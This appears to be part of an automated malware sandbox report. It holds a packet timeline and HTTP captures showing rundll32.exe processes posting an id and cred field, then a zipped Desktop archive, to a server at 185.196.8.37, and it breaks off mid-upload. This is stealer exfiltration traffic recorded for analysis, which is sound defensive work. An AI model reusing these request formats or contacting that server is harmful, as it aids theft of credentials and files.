                                    Feb 21, 2025 01:52:40.476577997 CET8049827185.196.8.37192.168.2.10
                                    Feb 21, 2025 01:52:40.476579905 CET4982780192.168.2.10185.196.8.37
                                    Feb 21, 2025 01:52:40.476634979 CET4982780192.168.2.10185.196.8.37
                                    Feb 21, 2025 01:52:40.476723909 CET8049827185.196.8.37192.168.2.10
                                    Feb 21, 2025 01:52:40.476792097 CET8049827185.196.8.37192.168.2.10
                                    Feb 21, 2025 01:52:40.476809025 CET4982780192.168.2.10185.196.8.37
                                    Feb 21, 2025 01:52:40.476946115 CET4982780192.168.2.10185.196.8.37
                                    Feb 21, 2025 01:52:40.476995945 CET4982780192.168.2.10185.196.8.37
                                    Feb 21, 2025 01:52:40.477098942 CET4982780192.168.2.10185.196.8.37
                                    Feb 21, 2025 01:52:40.477132082 CET8049827185.196.8.37192.168.2.10
                                    Feb 21, 2025 01:52:40.477149010 CET4982780192.168.2.10185.196.8.37
                                    Feb 21, 2025 01:52:40.477207899 CET4982780192.168.2.10185.196.8.37
                                    Feb 21, 2025 01:52:40.477242947 CET4982780192.168.2.10185.196.8.37
                                    Feb 21, 2025 01:52:40.477256060 CET8049827185.196.8.37192.168.2.10
                                    Feb 21, 2025 01:52:40.477287054 CET4982780192.168.2.10185.196.8.37
                                    Feb 21, 2025 01:52:40.477345943 CET4982780192.168.2.10185.196.8.37
                                    Feb 21, 2025 01:52:40.477391005 CET4982780192.168.2.10185.196.8.37
                                    Feb 21, 2025 01:52:40.477401972 CET8049827185.196.8.37192.168.2.10
                                    Feb 21, 2025 01:52:40.477427959 CET8049827185.196.8.37192.168.2.10
                                    Feb 21, 2025 01:52:40.477431059 CET4982780192.168.2.10185.196.8.37
                                    Feb 21, 2025 01:52:40.477438927 CET8049827185.196.8.37192.168.2.10
                                    Feb 21, 2025 01:52:40.477447987 CET8049827185.196.8.37192.168.2.10
                                    Feb 21, 2025 01:52:40.477485895 CET8049827185.196.8.37192.168.2.10
                                    Feb 21, 2025 01:52:40.477539062 CET8049827185.196.8.37192.168.2.10
                                    Feb 21, 2025 01:52:40.477587938 CET4982780192.168.2.10185.196.8.37
                                    Feb 21, 2025 01:52:40.477652073 CET8049827185.196.8.37192.168.2.10
                                    Feb 21, 2025 01:52:40.477653980 CET4982780192.168.2.10185.196.8.37
                                    Feb 21, 2025 01:52:40.477704048 CET4982780192.168.2.10185.196.8.37
                                    Feb 21, 2025 01:52:40.477742910 CET4982780192.168.2.10185.196.8.37
                                    Feb 21, 2025 01:52:40.477761984 CET8049827185.196.8.37192.168.2.10
                                    Feb 21, 2025 01:52:40.477788925 CET4982780192.168.2.10185.196.8.37
                                    Feb 21, 2025 01:52:40.477832079 CET4982780192.168.2.10185.196.8.37
                                    Feb 21, 2025 01:52:40.478122950 CET8049827185.196.8.37192.168.2.10
                                    Feb 21, 2025 01:52:40.478333950 CET8049827185.196.8.37192.168.2.10
                                    Feb 21, 2025 01:52:40.478343010 CET8049827185.196.8.37192.168.2.10
                                    Feb 21, 2025 01:52:40.478435040 CET8049827185.196.8.37192.168.2.10
                                    Feb 21, 2025 01:52:40.478467941 CET8049827185.196.8.37192.168.2.10
                                    Feb 21, 2025 01:52:40.478477001 CET8049827185.196.8.37192.168.2.10
                                    Feb 21, 2025 01:52:40.478512049 CET8049827185.196.8.37192.168.2.10
                                    Feb 21, 2025 01:52:40.478692055 CET8049827185.196.8.37192.168.2.10
                                    Feb 21, 2025 01:52:40.478701115 CET8049827185.196.8.37192.168.2.10
                                    Feb 21, 2025 01:52:40.478724957 CET8049827185.196.8.37192.168.2.10
                                    Feb 21, 2025 01:52:40.478821993 CET8049827185.196.8.37192.168.2.10
                                    Feb 21, 2025 01:52:40.478977919 CET8049827185.196.8.37192.168.2.10
                                    Feb 21, 2025 01:52:40.479060888 CET8049827185.196.8.37192.168.2.10
                                    Feb 21, 2025 01:52:40.479090929 CET8049827185.196.8.37192.168.2.10
                                    Feb 21, 2025 01:52:40.479377985 CET8049827185.196.8.37192.168.2.10
                                    Feb 21, 2025 01:52:40.479387999 CET8049827185.196.8.37192.168.2.10
                                    Feb 21, 2025 01:52:40.479681969 CET8049827185.196.8.37192.168.2.10
                                    Feb 21, 2025 01:52:40.479773045 CET8049827185.196.8.37192.168.2.10
                                    Feb 21, 2025 01:52:40.479783058 CET8049827185.196.8.37192.168.2.10
                                    Feb 21, 2025 01:52:40.479860067 CET8049827185.196.8.37192.168.2.10
                                    Feb 21, 2025 01:52:40.479878902 CET8049827185.196.8.37192.168.2.10
                                    Feb 21, 2025 01:52:40.480117083 CET8049827185.196.8.37192.168.2.10
                                    Feb 21, 2025 01:52:40.480212927 CET8049827185.196.8.37192.168.2.10
                                    Feb 21, 2025 01:52:40.480429888 CET8049827185.196.8.37192.168.2.10
                                    Feb 21, 2025 01:52:40.480561018 CET8049827185.196.8.37192.168.2.10
                                    Feb 21, 2025 01:52:40.480833054 CET8049827185.196.8.37192.168.2.10
                                    Feb 21, 2025 01:52:40.480845928 CET8049827185.196.8.37192.168.2.10
                                    Feb 21, 2025 01:52:40.481369019 CET8049827185.196.8.37192.168.2.10
                                    Feb 21, 2025 01:52:40.481408119 CET8049827185.196.8.37192.168.2.10
                                    Feb 21, 2025 01:52:40.481558084 CET8049827185.196.8.37192.168.2.10
                                    Feb 21, 2025 01:52:40.481566906 CET8049827185.196.8.37192.168.2.10
                                    Feb 21, 2025 01:52:40.481592894 CET8049827185.196.8.37192.168.2.10
                                    Feb 21, 2025 01:52:40.481801033 CET8049827185.196.8.37192.168.2.10
                                    Feb 21, 2025 01:52:40.481909990 CET8049827185.196.8.37192.168.2.10
                                    Feb 21, 2025 01:52:40.481920004 CET8049827185.196.8.37192.168.2.10
                                    Feb 21, 2025 01:52:40.482036114 CET8049827185.196.8.37192.168.2.10
                                    Feb 21, 2025 01:52:40.482253075 CET8049827185.196.8.37192.168.2.10
                                    Feb 21, 2025 01:52:40.482263088 CET8049827185.196.8.37192.168.2.10
                                    Feb 21, 2025 01:52:40.482275009 CET8049827185.196.8.37192.168.2.10
                                    Feb 21, 2025 01:52:40.482299089 CET8049827185.196.8.37192.168.2.10
                                    Feb 21, 2025 01:52:40.482331991 CET8049827185.196.8.37192.168.2.10
                                    Feb 21, 2025 01:52:40.482364893 CET8049827185.196.8.37192.168.2.10
                                    Feb 21, 2025 01:52:40.482558966 CET8049827185.196.8.37192.168.2.10
                                    Feb 21, 2025 01:52:40.482594967 CET8049827185.196.8.37192.168.2.10
                                    Feb 21, 2025 01:52:40.482666969 CET8049827185.196.8.37192.168.2.10
                                    Feb 21, 2025 01:52:40.482724905 CET8049827185.196.8.37192.168.2.10
                                    Feb 21, 2025 01:52:40.482734919 CET8049827185.196.8.37192.168.2.10
                                    Feb 21, 2025 01:52:40.482768059 CET8049827185.196.8.37192.168.2.10
                                    Feb 21, 2025 01:52:40.654620886 CET8049823185.196.8.37192.168.2.10
                                    Feb 21, 2025 01:52:40.654927969 CET4982380192.168.2.10185.196.8.37
                                    Feb 21, 2025 01:52:40.878592968 CET4982380192.168.2.10185.196.8.37
                                    Feb 21, 2025 01:52:41.174675941 CET8049827185.196.8.37192.168.2.10
                                    Feb 21, 2025 01:52:41.174909115 CET4982780192.168.2.10185.196.8.37
                                    Feb 21, 2025 01:52:41.272278070 CET4982780192.168.2.10185.196.8.37
                                    Feb 21, 2025 01:52:47.883544922 CET4972980192.168.2.10185.196.8.37

                                    HTTP Request Dependency Graph

                                    • 185.196.8.37

                                    HTTP Packets

                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.1049701185.196.8.37807892C:\Windows\System32\rundll32.exe
                                    TimestampBytes transferredDirectionData
                                    Feb 21, 2025 01:52:19.648806095 CET172OUTPOST /Gd85kkjf/index.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    Host: 185.196.8.37
                                    Content-Length: 21
                                    Cache-Control: no-cache
                                    Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d
                                    Data Ascii: id=246122658369&cred=
                                    Feb 21, 2025 01:52:20.345500946 CET148INHTTP/1.1 200 OK
                                    Date: Fri, 21 Feb 2025 00:52:20 GMT
                                    Server: Apache/2.4.52 (Ubuntu)
                                    Content-Length: 1
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 20
                                    Data Ascii:


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    1192.168.2.1049702185.196.8.37807916C:\Windows\System32\rundll32.exe
                                    TimestampBytes transferredDirectionData
                                    Feb 21, 2025 01:52:19.649265051 CET172OUTPOST /Gd85kkjf/index.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    Host: 185.196.8.37
                                    Content-Length: 21
                                    Cache-Control: no-cache
                                    Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d
                                    Data Ascii: id=246122658369&cred=
                                    Feb 21, 2025 01:52:20.354409933 CET148INHTTP/1.1 200 OK
                                    Date: Fri, 21 Feb 2025 00:52:20 GMT
                                    Server: Apache/2.4.52 (Ubuntu)
                                    Content-Length: 1
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 20
                                    Data Ascii:


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    2192.168.2.1049729185.196.8.37807228C:\Windows\System32\rundll32.exe
                                    TimestampBytes transferredDirectionData
                                    Feb 21, 2025 01:52:24.835906029 CET172OUTPOST /Gd85kkjf/index.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    Host: 185.196.8.37
                                    Content-Length: 21
                                    Cache-Control: no-cache
                                    Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d
                                    Data Ascii: id=246122658369&cred=
                                    Feb 21, 2025 01:52:25.522568941 CET148INHTTP/1.1 200 OK
                                    Date: Fri, 21 Feb 2025 00:52:25 GMT
                                    Server: Apache/2.4.52 (Ubuntu)
                                    Content-Length: 1
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 20
                                    Data Ascii:


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    3192.168.2.1049823185.196.8.37807892C:\Windows\System32\rundll32.exe
                                    TimestampBytes transferredDirectionData
                                    Feb 21, 2025 01:52:39.913918972 CET168OUTPOST /Gd85kkjf/index.php?wal=1 HTTP/1.1
                                    Content-Type: multipart/form-data; boundary=----NjE0Ng==
                                    Host: 185.196.8.37
                                    Content-Length: 6306
                                    Cache-Control: no-cache
                                    Feb 21, 2025 01:52:39.914052010 CET140OUTData Raw: 2d 2d 2d 2d 2d 2d 4e 6a 45 30 4e 67 3d 3d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36
                                    Data Ascii: ------NjE0Ng==Content-Disposition: form-data; name="data"; filename="246122658369_Desktop.zip"Content-Type: application/octet-stream
                                    Feb 21, 2025 01:52:39.914107084 CET8OUTData Raw: 50 4b 03 04 14 00 00 00
                                    Data Ascii: PK
                                    Feb 21, 2025 01:52:39.914182901 CET8OUTData Raw: 08 00 f2 33 45 57 34 fc
                                    Data Ascii: 3EW4
                                    Feb 21, 2025 01:52:39.914182901 CET8OUTData Raw: e7 a0 84 02 00 00 02 04
                                    Da